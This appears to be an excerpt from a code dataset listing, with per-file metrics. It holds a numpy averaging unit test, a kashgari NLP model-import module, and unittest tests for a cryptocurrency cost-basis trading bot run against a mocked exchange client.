        self.assertTrue(np.array_equal(combine_as_average_np(v1, v2), v1))
        self.assertTrue(np.array_equal(
            combine_as_average_np(v1, v2, include_zeros=False), v1))
        v1 = np.array([0.34, 0.66, 0, 0.2, 0.2, 0.34, 0.66, 0.0])
        v2 = np.array([0.3415, 0.579, 0.159, 0.3125, 0.4625, 0.371,
                       0.629, 0.159])
        self.assertTrue(np.array_equal(
            combine_as_average_np(v1, v2),
            np.divide(np.sum([v1, v2], axis=0), 2)))
# Allow running this test module directly with ``python`` as well as
# through a test runner such as pytest.
if __name__ == '__main__':
    unittest.main()
| 53.61
| 127
| 0.600261
| 1,001
| 5,361
| 3.080919
| 0.070929
| 0.177691
| 0.22179
| 0.26978
| 0.940013
| 0.916991
| 0.912451
| 0.899481
| 0.892996
| 0.866407
| 0
| 0.223498
| 0.220481
| 5,361
| 99
| 128
| 54.151515
| 0.514477
| 0.09196
| 0
| 0.540541
| 0
| 0
| 0.001676
| 0
| 0
| 0
| 0
| 0
| 0.297297
| 1
| 0.054054
| false
| 0
| 0.067568
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0b2fa418deb2ed032f17aa231cb7b546a6c9c219
| 1,217
|
py
|
Python
|
kashgari/tasks/labeling/__init__.py
|
ericperfect/Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder
|
6c38d25572612ffc74c9c35c3e9c7382deca334c
|
[
"Apache-2.0"
] | 16
|
2020-12-02T13:44:20.000Z
|
2022-03-16T00:49:34.000Z
|
kashgari/tasks/labeling/__init__.py
|
ericperfect/Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder
|
6c38d25572612ffc74c9c35c3e9c7382deca334c
|
[
"Apache-2.0"
] | 1
|
2022-01-11T08:14:05.000Z
|
2022-02-25T09:29:17.000Z
|
kashgari/tasks/labeling/__init__.py
|
ericperfect/Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder
|
6c38d25572612ffc74c9c35c3e9c7382deca334c
|
[
"Apache-2.0"
] | 3
|
2021-06-18T00:00:58.000Z
|
2022-03-26T11:35:24.000Z
|
# encoding: utf-8
# author: BrikerMan
# contact: eliyar917@gmail.com
# blog: https://eliyar.biz
# file: __init__.py
# time: 2019-05-20 11:34
from kashgari.tasks.labeling.models import CNN_LSTM_Model
from kashgari.tasks.labeling.models import Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder_Model
from kashgari.tasks.labeling.models import BiLSTM_Model
from kashgari.tasks.labeling.models import BiLSTM_CRF_Model
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model_Attenetion
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model_Position
from kashgari.tasks.labeling.models import BiGRU_Model
from kashgari.tasks.labeling.models import BiGRU_CRF_Model
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model_WordSegmentation
from kashgari.tasks.labeling.models import BiLSTM_CRF_Model_Attention
from kashgari.tasks.labeling.models import BiLSTM_LSTMDecoder_CRF_Model
from kashgari.tasks.labeling.models import BiLSTM_LSTMDecoder_Model
from kashgari.tasks.labeling.models import BiLSTM_CRF_Model_Position
from kashgari.tasks.labeling.models import Bert_BiLSTM_CRF_Model
if __name__ == "__main__":
print("Hello world")
| 45.074074
| 95
| 0.861134
| 176
| 1,217
| 5.642045
| 0.261364
| 0.181269
| 0.256798
| 0.377644
| 0.799597
| 0.799597
| 0.799597
| 0.656596
| 0.550856
| 0.429003
| 0
| 0.014222
| 0.075596
| 1,217
| 26
| 96
| 46.807692
| 0.868444
| 0.105177
| 0
| 0
| 0
| 0
| 0.01756
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.882353
| 0
| 0.882353
| 0.058824
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0b6af29a73dfb39a27243337e04c1256d5ed0e7a
| 13,316
|
py
|
Python
|
tests/test_cost_basis.py
|
chesswiz16/Trader
|
008308016be6803094b4f5891efa8687af95bacf
|
[
"MIT"
] | 1
|
2018-01-11T14:39:18.000Z
|
2018-01-11T14:39:18.000Z
|
tests/test_cost_basis.py
|
chesswiz16/Trader
|
008308016be6803094b4f5891efa8687af95bacf
|
[
"MIT"
] | null | null | null |
tests/test_cost_basis.py
|
chesswiz16/Trader
|
008308016be6803094b4f5891efa8687af95bacf
|
[
"MIT"
] | null | null | null |
import logging
import unittest
from unittest.mock import Mock, MagicMock
from tests.authenticated_client_regression import AuthenticatedClientRegression
from trader.cost_basis import CostBasisTrader
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class TestCostBasis(unittest.TestCase):
    """Regression tests for CostBasisTrader.

    test_on_order_done walks the trader through successive fills and checks
    the orders it places at each cost-basis depth; test_recovery restarts the
    trader against pre-existing open orders and checks that it resumes (or
    resets) its internal state.
    """

    def _assert_open_order(self, auth_client_mock, expected):
        """Assert an open order matching every key/value pair in *expected* exists.

        Each open order is projected down to only the keys present in
        *expected*, so extra fields (id, product_id, ...) don't affect the
        comparison.
        """
        self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])

    def _fill_order(self, trader, order):
        """Notify *trader* that *order* has been completely filled."""
        trader.on_order_done({
            'order_id': order['id'],
            'reason': 'filled',
            'product_id': 'ETH-USD',
        })

    def test_on_order_done(self):
        auth_client_mock = AuthenticatedClientRegression('ETH-USD', [100, 100, 100, 100], starting_balance=10000)
        auth_client_mock.cancel_all = Mock()
        auth_client_mock.get_product_ticker = MagicMock(return_value={
            'price': '100',
        })
        trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
        trader.on_start()
        # Get the seeded limit order and mock that it has been filled.
        limit_order = [x for x in auth_client_mock.orders if x['type'] == 'limit'][0]
        self.assertEqual(len(auth_client_mock.orders), 2)
        self._fill_order(trader, limit_order)
        # Depth 1: bought 10 @ 99, trader should post a sell plus the next buy.
        self.assertEqual(trader.current_order_depth, 1)
        self.assertEqual(trader.quote_currency_paid, 10 * 99.0)
        self.assertEqual(trader.base_currency_bought, 10)
        self.assertEqual(len(auth_client_mock.orders), 2)
        self._assert_open_order(auth_client_mock, {
            'side': 'sell',
            'size': '10.0',
            'price': '99.99',
            'type': 'limit',
            'post_only': True,
        })
        self._assert_open_order(auth_client_mock, {
            'side': 'buy',
            'size': '10.30405061',
            'price': '97.05',
            'type': 'limit',
            'post_only': True,
        })
        # Get the buy order and mock that it has been filled.
        buy_order = [x for x in auth_client_mock.orders if x['side'] == 'buy'][0]
        self._fill_order(trader, buy_order)
        # Depth 2: cost basis averages down, sell covers the full position.
        self.assertEqual(trader.current_order_depth, 2)
        self.assertEqual(trader.quote_currency_paid, 1990.0081117005002)
        self.assertEqual(trader.base_currency_bought, 20.30405061)
        self.assertEqual(len(auth_client_mock.orders), 2)
        self._assert_open_order(auth_client_mock, {
            'side': 'sell',
            'size': '20.30405061',
            'price': '98.99',
            'type': 'limit',
            'post_only': True,
        })
        self._assert_open_order(auth_client_mock, {
            'side': 'buy',
            'size': '10.51115093',
            'price': '95.14',
            'type': 'limit',
            'post_only': True,
        })
        # 3 deep now.
        buy_order = [x for x in auth_client_mock.orders if x['side'] == 'buy'][0]
        self._fill_order(trader, buy_order)
        self.assertEqual(trader.current_order_depth, 3)
        self.assertEqual(trader.quote_currency_paid, 2990.0390111807)
        self.assertEqual(trader.base_currency_bought, 30.81520154)
        self.assertEqual(len(auth_client_mock.orders), 2)
        self._assert_open_order(auth_client_mock, {
            'side': 'sell',
            'size': '30.81520154',
            'price': '98.0',
            'type': 'limit',
            'post_only': True,
        })
        self._assert_open_order(auth_client_mock, {
            'side': 'buy',
            'size': '10.72131821',
            'price': '93.27',
            'type': 'limit',
            'post_only': True,
        })
        # Unknown order id must be ignored: state and open orders unchanged.
        self._fill_order(trader, {'id': 'dummy'})
        self.assertEqual(trader.current_order_depth, 3)
        self.assertEqual(trader.quote_currency_paid, 2990.0390111807)
        self.assertEqual(trader.base_currency_bought, 30.81520154)
        self.assertEqual(len(auth_client_mock.orders), 2)
        self._assert_open_order(auth_client_mock, {
            'side': 'sell',
            'size': '30.81520154',
            'price': '98.0',
            'type': 'limit',
            'post_only': True,
        })
        self._assert_open_order(auth_client_mock, {
            'side': 'buy',
            'size': '10.72131821',
            'price': '93.27',
            'type': 'limit',
            'post_only': True,
        })
        # 4 deep (max depth exceeded): sell should go out but no further buy.
        buy_order = [x for x in auth_client_mock.orders if x['side'] == 'buy'][0]
        self._fill_order(trader, buy_order)
        self.assertEqual(trader.current_order_depth, 4)
        self.assertEqual(trader.quote_currency_paid, 3990.0163606274)
        self.assertEqual(trader.base_currency_bought, 41.53651975)
        self.assertEqual(len(auth_client_mock.orders), 1)
        self._assert_open_order(auth_client_mock, {
            'side': 'sell',
            'size': '41.53651975',
            'price': '97.02',
            'type': 'limit',
            'post_only': True,
        })
        # Sell comes in, should reset the cost basis to market.
        sell_order = [x for x in auth_client_mock.orders if x['side'] == 'sell'][0]
        trader.place_next_orders({
            'maker_order_id': sell_order['id'],
            'taker_order_id': '',
            'type': 'match',
            'price': sell_order['price'],
            'side': 'sell',
            'size': sell_order['size'],
        })
        # Compare against order ids: the original `sell_order['id'] not in
        # auth_client_mock.orders` tested a string against a list of dicts and
        # was vacuously true.
        self.assertNotIn(sell_order['id'], [x['id'] for x in auth_client_mock.orders])
        self.assertEqual(trader.current_order_depth, 0)
        self.assertEqual(trader.quote_currency_paid, 0.0)
        self.assertEqual(trader.base_currency_bought, 0.0)
        self.assertEqual(len(auth_client_mock.orders), 2)
        self._assert_open_order(auth_client_mock, {
            'side': 'buy',
            'size': '10.0',
            'price': '101.0',
            'type': 'stop',
            'post_only': False,
        })
        self._assert_open_order(auth_client_mock, {
            'side': 'buy',
            'size': '10.0',
            'price': '99.0',
            'type': 'limit',
            'post_only': True,
        })
        # Cash plus the notional value of the open orders.
        wallet_value = trader.get_available_balance('USD')
        for order in auth_client_mock.orders:
            wallet_value += float(order['size']) * float(order['price'])
        # Make sure we actually made money...
        self.assertGreater(wallet_value, 10000)

    def test_recovery(self):
        auth_client_mock = AuthenticatedClientRegression('ETH-USD', [100, 100, 100, 100])
        auth_client_mock.get_accounts = MagicMock(return_value=[
            {
                'currency': 'ETH',
                'available': '0',
                'balance': '0',
                'id': '1',
            },
            {
                'currency': 'USD',
                'available': '10000',
                'balance': '10000',
                'id': '2',
            },
        ])
        auth_client_mock.cancel_order = MagicMock(return_value={})
        auth_client_mock.cancel_all = Mock()
        auth_client_mock.get_product_ticker = MagicMock(return_value={
            'price': '100',
        })
        # Fresh start: two seeding orders, no position.
        trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
        trader.on_start()
        # Was assertTrue(len(...), 2) — the 2 was silently treated as the
        # failure message, so only truthiness was checked.
        self.assertEqual(len(auth_client_mock.orders), 2)
        self.assertEqual(trader.base_currency_bought, 0.0)
        self.assertEqual(trader.quote_currency_paid, 0.0)
        self.assertEqual(trader.current_order_depth, 0)
        # Has seeding orders, assert orders are the same.
        trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
        orders = [
            {
                'id': 'id1',
                'side': 'buy',
                'size': '20',
                'price': '101.0',
                'type': 'stop',
                'product_id': 'ETH-USD',
                'post_only': False,
            },
            {
                'id': 'id1',
                'side': 'buy',
                'size': '20',
                'price': '99.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
        ]
        auth_client_mock.orders = orders
        trader.on_start()
        self.assertEqual(len(auth_client_mock.orders), 2)
        self.assertEqual(trader.base_currency_bought, 0.0)
        self.assertEqual(trader.quote_currency_paid, 0.0)
        self.assertEqual(trader.current_order_depth, 0)
        self.assertEqual(auth_client_mock.orders, orders)
        # Has limit buy and sell, pick up where we were.
        trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
        orders = [
            {
                'id': 'id1',
                'side': 'sell',
                'size': '20',
                'price': '101.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
            {
                'id': 'id1',
                'side': 'buy',
                'size': '20',
                'price': '99.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
        ]
        auth_client_mock.orders = orders
        trader.on_start()
        self.assertEqual(len(auth_client_mock.orders), 2)
        self.assertEqual(trader.base_currency_bought, 20)
        self.assertEqual(trader.quote_currency_paid, 20 * 100)
        self.assertEqual(trader.current_order_depth, 2)
        self.assertEqual(auth_client_mock.orders, orders)
        # Has limit sell, pick up where we were.
        trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
        orders = [
            {
                'id': 'id1',
                'side': 'sell',
                'size': '20',
                'price': '101.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
        ]
        auth_client_mock.orders = orders
        trader.on_start()
        # NOTE(review): assertTrue's second argument is a *message*, so this
        # only checks len(...) is truthy. It cannot be converted to
        # assertEqual(..., 2): the assertEqual(orders, orders) below pins the
        # list at 1 entry. Confirm the intended count with the author.
        self.assertTrue(len(auth_client_mock.orders), 2)
        self.assertEqual(trader.base_currency_bought, 20)
        self.assertEqual(trader.quote_currency_paid, 20 * 100)
        self.assertEqual(trader.current_order_depth, 2)
        self.assertEqual(auth_client_mock.orders, orders)
        # Only has buy, reset.
        trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
        orders = [
            {
                'id': 'id1',
                'side': 'buy',
                'size': '20',
                'price': '99.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
        ]
        auth_client_mock.orders = orders
        trader.on_start()
        # NOTE(review): same assertTrue misuse — only truthiness is checked.
        # The order count after a reset with cancel_all mocked out is not
        # pinned elsewhere, so left as-is pending confirmation.
        self.assertTrue(len(auth_client_mock.orders), 2)
        self.assertEqual(trader.base_currency_bought, 0.0)
        self.assertEqual(trader.quote_currency_paid, 0.0)
        self.assertEqual(trader.current_order_depth, 0)
        # Weird order state, resets status.
        trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
        orders = [
            {
                'id': 'id1',
                'side': 'sell',
                'size': '20',
                'price': '101.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
            {
                'id': 'id1',
                'side': 'buy',
                'size': '20',
                'price': '99.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
            {
                'id': 'id1',
                'side': 'buy',
                'size': '20',
                'price': '99.0',
                'type': 'limit',
                'product_id': 'ETH-USD',
                'post_only': True,
            },
        ]
        auth_client_mock.orders = orders
        # NOTE(review): trader.on_start() is never called in this final
        # section, so the assertions below only check a freshly-constructed
        # trader's defaults; the len check also has the assertTrue misuse
        # (the list actually holds 3 orders). Likely a missing on_start() —
        # confirm intent before changing.
        self.assertTrue(len(auth_client_mock.orders), 2)
        self.assertEqual(trader.base_currency_bought, 0.0)
        self.assertEqual(trader.quote_currency_paid, 0.0)
        self.assertEqual(trader.current_order_depth, 0)
| 37.615819
| 113
| 0.521628
| 1,477
| 13,316
| 4.50914
| 0.109005
| 0.091592
| 0.113514
| 0.132132
| 0.820871
| 0.813363
| 0.780781
| 0.753153
| 0.753153
| 0.73048
| 0
| 0.049601
| 0.341394
| 13,316
| 353
| 114
| 37.72238
| 0.709806
| 0.032217
| 0
| 0.714724
| 0
| 0
| 0.123116
| 0.001942
| 0
| 0
| 0
| 0
| 0.199387
| 1
| 0.006135
| false
| 0
| 0.015337
| 0
| 0.02454
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.